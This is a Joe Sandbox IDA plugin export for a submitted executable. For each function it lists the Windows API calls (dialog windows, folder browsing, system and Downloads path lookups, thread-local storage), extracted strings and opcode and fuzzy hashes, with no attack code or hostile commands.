Snapshot File: hcaresult_0_2_400000_nkYzjyrKYK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2afca31d5e402dc53a6e3c1547e4f0f7fd84e8efed120adad160e64feba3fa86
Instruction ID: ce7637385bf2580d4bd45f7eed7cd981386548e1214f237c7f2b1e334cab5801
Opcode Fuzzy Hash: 2afca31d5e402dc53a6e3c1547e4f0f7fd84e8efed120adad160e64feba3fa86
Instruction Fuzzy Hash: B381B472620852CBE718CF1DEC907B63353E7C9340F99C639DA028779AE538B562C795

Function 00410C80 Relevance: .2, Instructions: 193COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4606063014.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.4606021737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4606107211.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4606147052.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4606183078.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_nkYzjyrKYK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ebf3ce41f3a936af8fc8571fd5a5b65ced049cf5f7b88b68e7c4ff41129e470b
Instruction ID: eb62069f37237363b8ce6edce14327945305ce31afdb1d79ed38a397900698d6
Opcode Fuzzy Hash: ebf3ce41f3a936af8fc8571fd5a5b65ced049cf5f7b88b68e7c4ff41129e470b
Instruction Fuzzy Hash: 0A71F3F16205824BD714CF29FCD067673A2EBD9384F4AC639DB0287396C238B971C695

Function 00410FB0 Relevance: .1, Instructions: 143COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4606063014.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.4606021737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4606107211.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4606147052.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4606183078.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_nkYzjyrKYK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2ab1992bfbf39856a5a7dba111a3cc4862fa1f22f04eab95b8f25578d2bf0e3f
Instruction ID: af0191558bb113c69bf01aa77dc2a624928e07331dce5fde3109ee2fd9e39919
Opcode Fuzzy Hash: 2ab1992bfbf39856a5a7dba111a3cc4862fa1f22f04eab95b8f25578d2bf0e3f
Instruction Fuzzy Hash: 5941EA32A4474547E728CF28C8553EFB390AB88304F45493ECB9697B60CB6EE9C68685

Function 00411033 Relevance: .1, Instructions: 100COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4606063014.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.4606021737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4606107211.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4606147052.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4606183078.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_nkYzjyrKYK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6219c0534570dcc087454eb9247404a7b3db1bae580b6f203b5ef7fccfb18fab
Instruction ID: 72b98655ba701b9d964f93d3241bb8f545428b910a5ae8810ed1e036a2f8a9ba
Opcode Fuzzy Hash: 6219c0534570dcc087454eb9247404a7b3db1bae580b6f203b5ef7fccfb18fab
Instruction Fuzzy Hash: AD31DC32E447854BE728CF28C8953EB7390BB88304F49093FCB4697BA1C66AE9C5C645

Function 00411079 Relevance: .1, Instructions: 82COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4606063014.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.4606021737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4606107211.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4606147052.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4606183078.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_nkYzjyrKYK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8f177ef76dc2d83bc780de5ca5247833b6fb957e59de742fcb7e95280a36d76d
Instruction ID: 87db66efce333c178885a799e057bc316407fa68a453293863d00c93a718f179
Opcode Fuzzy Hash: 8f177ef76dc2d83bc780de5ca5247833b6fb957e59de742fcb7e95280a36d76d
Instruction Fuzzy Hash: D121BB32A447450BE728CB28D8953FBB390AB88304F49493FCB5687BA1C66AD9C5C644

Function 00408F69 Relevance: 65.0, APIs: 32, Strings: 5, Instructions: 270windowregistrymemoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00408E58: wcslen.MSVCRT ref: 00408E64
Part of subcall function 00408E58: HeapAlloc.KERNEL32(00000000,00000000,?,00408F81,?), ref: 00408E7A
Part of subcall function 00408E58: wcscpy.MSVCRT ref: 00408E8B

GetStockObject.GDI32(00000011), ref: 00408FB2
LoadIconW.USER32 ref: 00408FE9
LoadCursorW.USER32(00000000,00007F00), ref: 00408FF9
RegisterClassExW.USER32 ref: 00409021
IsWindowEnabled.USER32(00000000), ref: 00409048
EnableWindow.USER32(00000000), ref: 00409059
GetSystemMetrics.USER32(00000001), ref: 00409091
GetSystemMetrics.USER32(00000000), ref: 0040909E
CreateWindowExW.USER32(00000000,00000000,10C80000,-00000096,?,?,?,?,?), ref: 004090BF
SetWindowLongW.USER32(00000000,000000EB,?), ref: 004090D3
CreateWindowExW.USER32(00000000,STATIC,?,5000000B,0000000A,0000000A,00000118,00000016,00000000,00000000,00000000), ref: 00409101
SendMessageW.USER32(00000000,00000030,00000001), ref: 00409119
CreateWindowExW.USER32(00000200,EDIT,00000000,00000000,0000000A,00000020,00000113,00000015,00000000,0000000A,00000000), ref: 00409157
SendMessageW.USER32(00000000,00000030,00000001), ref: 00409169
SetFocus.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00409171
SendMessageW.USER32(0000000C,00000000,00000000), ref: 00409186
wcslen.MSVCRT ref: 00409189
wcslen.MSVCRT ref: 00409191
SendMessageW.USER32(000000B1,00000000,00000000), ref: 004091A3
CreateWindowExW.USER32(00000000,BUTTON,00413080,50010001,0000006E,00000043,00000050,00000019,00000000,000003E8,00000000), ref: 004091CD
SendMessageW.USER32(00000000,00000030,00000001), ref: 004091DF
CreateAcceleratorTableW.USER32(?,00000002,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00409216
SetForegroundWindow.USER32(00000000), ref: 0040921F
BringWindowToTop.USER32(00000000), ref: 00409226
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00409239
TranslateAcceleratorW.USER32(00000000,00000000,?), ref: 0040924A
TranslateMessage.USER32(?), ref: 00409259
DispatchMessageW.USER32(?), ref: 00409264
DestroyAcceleratorTable.USER32(00000000), ref: 00409278
wcslen.MSVCRT ref: 00409289
wcscpy.MSVCRT ref: 004092A1
HeapFree.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004092B4

Strings

0, xrefs: 00408FC5
STATIC, xrefs: 004090FB
D0A, xrefs: 00409003
EDIT, xrefs: 0040914D
BUTTON, xrefs: 004091C6

Memory Dump Source

Source File: 00000000.00000002.4606063014.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.4606021737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4606107211.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4606147052.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4606183078.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_nkYzjyrKYK.jbxd

Similarity

API ID: Window$Message$CreateSend$wcslen$Accelerator$HeapLoadMetricsSystemTableTranslatewcscpy$AllocBringClassCursorDestroyDispatchEnableEnabledFocusForegroundFreeIconLongObjectRegisterStock
String ID: 0$BUTTON$D0A$EDIT$STATIC
API String ID: 54849019-2968808370
Opcode ID: 64b7048e9784f6b3a965978878b2fb0e8fb718a1bb0b3c0aee67433a202d6ab7
Instruction ID: ac9e317f2143d035474ccc6d8eb2369134aae38ec411cec841dcb6eceac04435
Opcode Fuzzy Hash: 64b7048e9784f6b3a965978878b2fb0e8fb718a1bb0b3c0aee67433a202d6ab7
Instruction Fuzzy Hash: FC919071548300BFE7219F65DD49F9B7BE9EB48B50F00483EFA84A61E1CBB988408B5D

Function 00401511 Relevance: 26.6, APIs: 1, Strings: 14, Instructions: 335fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32(?,00000000,?,?,00000000,?), ref: 00401648

Part of subcall function 0040E520: GetLastError.KERNEL32(00001000,00000000,00000000), ref: 0040E526
Part of subcall function 0040E520: TlsGetValue.KERNEL32(0000000D), ref: 0040E535
Part of subcall function 0040E520: SetLastError.KERNEL32(?), ref: 0040E54B

Part of subcall function 004057F0: wcsncmp.MSVCRT ref: 00405853
Part of subcall function 004057F0: memmove.MSVCRT(00000000,00000000,?,00000000,00000000,?,?,-0000012C,?,?,00402252,00000000,00000002,00000000,00000000,00417024), ref: 004058E1
Part of subcall function 004057F0: wcsncpy.MSVCRT ref: 004058F9

Part of subcall function 0040E560: TlsGetValue.KERNEL32(0000000D,00000000,00000000), ref: 0040E56C
Part of subcall function 0040E560: RtlAllocateHeap.NTDLL(00980000,00000000,?), ref: 0040E599

Part of subcall function 0040E560: RtlReAllocateHeap.NTDLL(00980000,00000000,?,?), ref: 0040E5BC

Part of subcall function 0040AD45: wcsncpy.MSVCRT ref: 0040AD63
Part of subcall function 0040AD45: wcslen.MSVCRT ref: 0040AD75
Part of subcall function 0040AD45: CreateDirectoryW.KERNELBASE(?,00000000), ref: 0040ADB5

Part of subcall function 0040E6C0: wcslen.MSVCRT ref: 0040E6D7

Strings

6pA, xrefs: 00401795
\pA, xrefs: 004015FE
.pA, xrefs: 0040168D
6pA, xrefs: 004017DE
\pA, xrefs: 004015A1, 004015D8, 004015E2, 004015F4, 004015DC, 004015E6, 004015EE, 004015F8
2pA, xrefs: 00401704
\pA, xrefs: 0040159B
6pA, xrefs: 00401872
&pA, xrefs: 00401560
\pA, xrefs: 00401846
2pA, xrefs: 004016AC
\pA, xrefs: 00401908
2pA, xrefs: 004016D6
$pA, xrefs: 00401656

Memory Dump Source

Source File: 00000000.00000002.4606063014.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.4606021737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4606107211.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4606147052.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4606183078.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_nkYzjyrKYK.jbxd

Similarity

API ID: AllocateErrorHeapLastValuewcslenwcsncpy$CreateDirectoryFileWritememmovewcsncmp
String ID: $pA$&pA$.pA$2pA$2pA$2pA$6pA$6pA$6pA$\pA$\pA$\pA$\pA$\pA
API String ID: 1295435411-2952853158
Opcode ID: f74ca6a30055bb3b4b7f0c97758a6a21bcfed651843c0f20eba03e435c67936c
Instruction ID: 61c24dd49085b80bd1b70adcfbfbd818be60928fccba90bb55e88b0b877bbf77
Opcode Fuzzy Hash: f74ca6a30055bb3b4b7f0c97758a6a21bcfed651843c0f20eba03e435c67936c
Instruction Fuzzy Hash: AEB11FB1104304BED600BB62DD8297F77A9EB88708F50CD3FB144A61E2EA3DDD55962E

Function 00409355 Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 116libraryloaderCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 00409373

Part of subcall function 0040EA90: TlsGetValue.KERNEL32(0000000D,\\?\,?,004096ED,00000104,?,?,?,00401BD6,00000000,00000000,00000000,00000002,00000000,00000000,00000000), ref: 0040EA9A

memset.MSVCRT ref: 00409381
LoadLibraryW.KERNEL32(SHELL32.DLL,?,?,0000000A), ref: 0040938E
GetProcAddress.KERNEL32(00000000,SHBrowseForFolderW), ref: 004093B0
GetProcAddress.KERNEL32(00000000,SHGetPathFromIDListW), ref: 004093BC
wcsncpy.MSVCRT ref: 004093DD
wcslen.MSVCRT ref: 004093F1
CoTaskMemFree.OLE32(?), ref: 0040947A
wcslen.MSVCRT ref: 00409481
FreeLibrary.KERNEL32(00000000,00000000), ref: 004094A0

Strings

P, xrefs: 00409429
SHGetPathFromIDListW, xrefs: 004093B2
SHBrowseForFolderW, xrefs: 004093AA
SHELL32.DLL, xrefs: 00409389
$0A, xrefs: 004093CD

Memory Dump Source

Source File: 00000000.00000002.4606063014.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.4606021737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4606107211.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4606147052.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4606183078.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_nkYzjyrKYK.jbxd

Similarity

API ID: AddressFreeLibraryProcwcslen$InitializeLoadTaskValuememsetwcsncpy
String ID: $0A$P$SHBrowseForFolderW$SHELL32.DLL$SHGetPathFromIDListW
API String ID: 4193992262-92458654
Opcode ID: cbde42508be9eaa54418296cf2fcec228ecaff496ce27a8586192ba66c484795
Instruction ID: dd14e0d5c7aaf6d086be5bb491997024bece532a8fadf3e5f1c49f9ab44bf52d
Opcode Fuzzy Hash: cbde42508be9eaa54418296cf2fcec228ecaff496ce27a8586192ba66c484795
Instruction Fuzzy Hash: 43414471508304AAC720EF759C49A9FBBE8EF88714F004C3FF945E3292D77899458B5A

Function 00406310 Relevance: 21.3, APIs: 9, Strings: 3, Instructions: 275COMMON

Download Yara Rule

APIs

wcsncpy.MSVCRT ref: 00406405

Part of subcall function 0040E880: TlsGetValue.KERNEL32(0000000D,?,?,00405EC5,00001000,00001000,?,?,00001000,00402F92,00000000,00000008,00000001,00000000,00000000,00000000), ref: 0040E88A

_wcsdup.MSVCRT ref: 0040644E
_wcsdup.MSVCRT ref: 00406469
_wcsdup.MSVCRT ref: 0040648C
wcsncpy.MSVCRT ref: 00406578
free.MSVCRT ref: 004065DC
free.MSVCRT ref: 004065EF
free.MSVCRT ref: 00406602
wcsncpy.MSVCRT ref: 0040662E

Strings

$0A, xrefs: 0040632F
$0A, xrefs: 0040633E
$0A, xrefs: 0040631F

Memory Dump Source

Source File: 00000000.00000002.4606063014.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.4606021737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4606107211.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4606147052.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4606183078.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_nkYzjyrKYK.jbxd

Similarity

API ID: _wcsdupfreewcsncpy$Value
String ID: $0A$$0A$$0A
API String ID: 1554701960-360074770
Opcode ID: f59d57380f8462386650d730b526675ad7e9bff01cb308e942a75ae948ec079d
Instruction ID: 8dd6decbfdfb2e9f9ed0212bb19f765ed94392260ea2aa670051c2f9137328dc
Opcode Fuzzy Hash: f59d57380f8462386650d730b526675ad7e9bff01cb308e942a75ae948ec079d
Instruction Fuzzy Hash: 27A1BD715043019BCB209F18C881A2BB7F1EF94348F49493EFC8667391E77AD965CB9A

Function 0040AEBA Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 91libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 0040E900: TlsGetValue.KERNEL32(0000000D,00001000,00000000,00000000), ref: 0040E90C
Part of subcall function 0040E900: HeapReAlloc.KERNEL32(00980000,00000000,?,?), ref: 0040E967

LoadLibraryW.KERNEL32(Shell32.DLL,00000104,?,?,?,?,00000009,0040373D,00000001,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0040AEE3
GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 0040AEF5
wcscpy.MSVCRT ref: 0040AF1B
wcscat.MSVCRT ref: 0040AF26
wcslen.MSVCRT ref: 0040AF2C
CoTaskMemFree.OLE32(?,00000000,00000000,?,00989768,00000000,00000000), ref: 0040AF3A
FreeLibrary.KERNEL32(00000000,?,?,?,00000009,0040373D,00000001,00000000,00000000,00000000,?,00000000,00000000,00000000,00404746,00000000), ref: 0040AF41
wcscat.MSVCRT ref: 0040AF59
wcslen.MSVCRT ref: 0040AF5F

Strings

Shell32.DLL, xrefs: 0040AEDE
Downloads\, xrefs: 0040AF53
SHGetKnownFolderPath, xrefs: 0040AEEF

Memory Dump Source

Source File: 00000000.00000002.4606063014.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.4606021737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4606107211.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4606147052.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4606183078.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_nkYzjyrKYK.jbxd

Similarity

API ID: FreeLibrarywcscatwcslen$AddressAllocHeapLoadProcTaskValuewcscpy
String ID: Downloads\$SHGetKnownFolderPath$Shell32.DLL
API String ID: 1740785346-287042676
Opcode ID: 3b5950ac527df3ef7cda72db0df74ea4b6227c4cc24e67ecc582cb497ed06186
Instruction ID: 692465ff5638a5220195cb25a460cc83d5c0d74b8cd54d9d2378aa313f557f39
Opcode Fuzzy Hash: 3b5950ac527df3ef7cda72db0df74ea4b6227c4cc24e67ecc582cb497ed06186
Instruction Fuzzy Hash: 59210DB12483037AC121A7629C4AF6B3968DB51B95F10043FF505B51C1DABCC96195AF

Function 00412722 Relevance: 19.6, APIs: 13, Instructions: 74memoryregistrythreadCOMMON

Download Yara Rule

APIs

TlsAlloc.KERNEL32(?,?,0040E6B8,0040E620,00000000,?,00402EF9,00000000,00000000,00000000,00000000,?,0040118D,00000000,00000000,00000000), ref: 00412732
InitializeCriticalSection.KERNEL32(004186E8,?,?,0040E6B8,0040E620,00000000,?,00402EF9,00000000,00000000,00000000,00000000,?,0040118D,00000000,00000000), ref: 0041273E
TlsGetValue.KERNEL32(?,?,0040E6B8,0040E620,00000000,?,00402EF9,00000000,00000000,00000000,00000000,?,0040118D,00000000,00000000,00000000), ref: 00412754
HeapAlloc.KERNEL32(00000008,00000014,?,?,0040E6B8,0040E620,00000000,?,00402EF9,00000000,00000000,00000000,00000000,?,0040118D,00000000), ref: 0041276E
EnterCriticalSection.KERNEL32(004186E8,?,?,0040E6B8,0040E620,00000000,?,00402EF9,00000000,00000000,00000000,00000000,?,0040118D,00000000,00000000), ref: 0041277F
LeaveCriticalSection.KERNEL32(004186E8,?,?,?,0040E6B8,0040E620,00000000,?,00402EF9,00000000,00000000,00000000,00000000,?,0040118D,00000000), ref: 0041279B
GetCurrentProcess.KERNEL32(00000000,00100000,00000000,00000000,?,?,?,0040E6B8,0040E620,00000000,?,00402EF9,00000000,00000000,00000000,00000000), ref: 004127B4
GetCurrentThread.KERNEL32 ref: 004127B7
GetCurrentProcess.KERNEL32(00000000,?,?,?,0040E6B8,0040E620,00000000,?,00402EF9,00000000,00000000,00000000,00000000,?,0040118D,00000000), ref: 004127BE
DuplicateHandle.KERNEL32(00000000,?,?,?,0040E6B8,0040E620,00000000,?,00402EF9,00000000,00000000,00000000,00000000,?,0040118D,00000000), ref: 004127C1
RegisterWaitForSingleObject.KERNEL32(0000000C,00000000,0041281A,00000000,000000FF,00000008), ref: 004127D7
TlsSetValue.KERNEL32(00000000,?,?,?,0040E6B8,0040E620,00000000,?,00402EF9,00000000,00000000,00000000,00000000,?,0040118D,00000000), ref: 004127E4
HeapAlloc.KERNEL32(00000000,0000000C,?,?,0040E6B8,0040E620,00000000,?,00402EF9,00000000,00000000,00000000,00000000,?,0040118D,00000000), ref: 004127F5

Memory Dump Source

Source File: 00000000.00000002.4606063014.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.4606021737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4606107211.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4606147052.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4606183078.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_nkYzjyrKYK.jbxd

Similarity

API ID: AllocCriticalCurrentSection$HeapProcessValue$DuplicateEnterHandleInitializeLeaveObjectRegisterSingleThreadWait
String ID:
API String ID: 298514914-0
Opcode ID: 2e736260770be91d420535d1c957e5431970d5774848fb61a6feb3a44565c38a
Instruction ID: 7332ff317071e0a972604479ba3dd7ff9d073507a24f1d64326450f2c9127e0c
Opcode Fuzzy Hash: 2e736260770be91d420535d1c957e5431970d5774848fb61a6feb3a44565c38a
Instruction Fuzzy Hash: 36210770644301BFDB119F60ED88B967FB9FB08761F14C43AF505A62A1CBB49850CB68

Function 00403221 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 176COMMON

Download Yara Rule

APIs

GetWindowsDirectoryW.KERNEL32(00000000,00000800,00000000,00000800,00000000,00000000,?,00000000,00000000), ref: 004032AE
PathAddBackslashW.SHLWAPI(00000000,00000000,00000800,00000000,00000800,00000000,00000000,?,00000000,00000000), ref: 004032B7
GetSystemDirectoryW.KERNEL32(00000000,00000800), ref: 004033D7
PathAddBackslashW.SHLWAPI(00000000,00000000,00000800,00000000,00000800,00000000,00000000,00000000,00000800,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 004033E0

Part of subcall function 0040E560: RtlReAllocateHeap.NTDLL(00980000,00000000,?,?), ref: 0040E5BC

PathAddBackslashW.SHLWAPI(00000000,00000000,sysnative,00000000,00000000,00000000,00000000,00000800,00000000,00000800,00000000,00000000,?,00000000,00000000), ref: 004032E7

Part of subcall function 0040E520: GetLastError.KERNEL32(00001000,00000000,00000000), ref: 0040E526
Part of subcall function 0040E520: TlsGetValue.KERNEL32(0000000D), ref: 0040E535
Part of subcall function 0040E520: SetLastError.KERNEL32(?), ref: 0040E54B

Part of subcall function 0040E560: TlsGetValue.KERNEL32(0000000D,00000000,00000000), ref: 0040E56C
Part of subcall function 0040E560: RtlAllocateHeap.NTDLL(00980000,00000000,?), ref: 0040E599

GetSystemDirectoryW.KERNEL32(00000000,00000800), ref: 00403414
PathAddBackslashW.SHLWAPI(00000000,00000000,00000800,00000000,00000000,?,00000000,00000000), ref: 0040341D

Strings

sysnative, xrefs: 004032CE, 004032D3

Memory Dump Source

Source File: 00000000.00000002.4606063014.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.4606021737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4606107211.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4606147052.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4606183078.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_nkYzjyrKYK.jbxd

Similarity

API ID: BackslashPath$Directory$AllocateErrorHeapLastSystemValue$Windows
String ID: sysnative
API String ID: 3406704365-821172135
Opcode ID: dcf8b3965b225b824d1e361c097f0450ffb78b4b70f7232e50374016482f67d3
Instruction ID: e6855e8cc6b59ba75e59fbb34a632fbdfc5c60153de78cbca022c055a9fde60a
Opcode Fuzzy Hash: dcf8b3965b225b824d1e361c097f0450ffb78b4b70f7232e50374016482f67d3
Instruction Fuzzy Hash: 83510A75118201BAD600BBB3DC82E3F66A9EB8075CF10CC3EB144751E2EA3DD9655A6E

Function 0040E0C3 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 53librarysleeploaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(Kernel32.dll,00000000,00000000,00000000,00000004,00000000,0040DED5,0041867C,0040E062,00000000,FFFFFFED,00000200,77355E70,0040A4F6,FFFFFFED,00000010), ref: 0040E0D1
GetProcAddress.KERNEL32(00000000,InitOnceExecuteOnce), ref: 0040E0E6
FreeLibrary.KERNEL32(00000000,?,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000,00000000,00000000), ref: 0040E101
InterlockedCompareExchange.KERNEL32(00000000,00000001,00000000), ref: 0040E110
Sleep.KERNEL32(00000000,?,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000,00000000,00000000), ref: 0040E122
InterlockedExchange.KERNEL32(00000000,00000002), ref: 0040E135

Strings

Kernel32.dll, xrefs: 0040E0CA
InitOnceExecuteOnce, xrefs: 0040E0E0

Memory Dump Source

Source File: 00000000.00000002.4606063014.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.4606021737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4606107211.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4606147052.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4606183078.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_nkYzjyrKYK.jbxd

Similarity

API ID: ExchangeInterlockedLibrary$AddressCompareFreeLoadProcSleep
String ID: InitOnceExecuteOnce$Kernel32.dll
API String ID: 2918862794-1339284965
Opcode ID: 5ce0d2485c1bb4decbbcb922162a80cd5c7d15fe9eeb9708d5254b12b909fa63
Instruction ID: f1debd77009d833240bff916e076c3bff8506a5db62120b34ae0b3aef6ef2b9b
Opcode Fuzzy Hash: 5ce0d2485c1bb4decbbcb922162a80cd5c7d15fe9eeb9708d5254b12b909fa63
Instruction Fuzzy Hash: 3001D431244214FBD6201FA2DC4DFEB7B79EB45B52F10883AF501B51C0EAB85D21C66D

Function 00409507 Relevance: 12.0, APIs: 8, Instructions: 50threadwindowCOMMON

Download Yara Rule

APIs

GetWindowThreadProcessId.USER32(?,00000000), ref: 00409511
GetCurrentThreadId.KERNEL32 ref: 0040951F
IsWindowVisible.USER32(?), ref: 00409526

Part of subcall function 0040E1F2: HeapAlloc.KERNEL32(00000008,00000000,0040DA6C,00418670,00000014,?,?,?,?,00409674,00000010,00000000,00000000,00401071,00000000,00001000), ref: 0040E1FE

GetCurrentThreadId.KERNEL32 ref: 00409543
GetWindowLongW.USER32(?,000000EC), ref: 00409550
GetForegroundWindow.USER32 ref: 0040955E
IsWindowEnabled.USER32(?), ref: 00409569
EnableWindow.USER32(?,00000000), ref: 00409579

Memory Dump Source

Source File: 00000000.00000002.4606063014.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.4606021737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4606107211.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4606147052.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4606183078.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_nkYzjyrKYK.jbxd

Similarity

API ID: Window$Thread$Current$AllocEnableEnabledForegroundHeapLongProcessVisible
String ID:
API String ID: 3383493704-0
Opcode ID: 68a633d90a34132dfb5e2fdbc66a21f5e6654eddc9afd13cb677bbd48b54e552
Instruction ID: 39f81579f69f96c849a8792b8e2bccb0372a8aae8c011f207204c0ba92c0e649
Opcode Fuzzy Hash: 68a633d90a34132dfb5e2fdbc66a21f5e6654eddc9afd13cb677bbd48b54e552
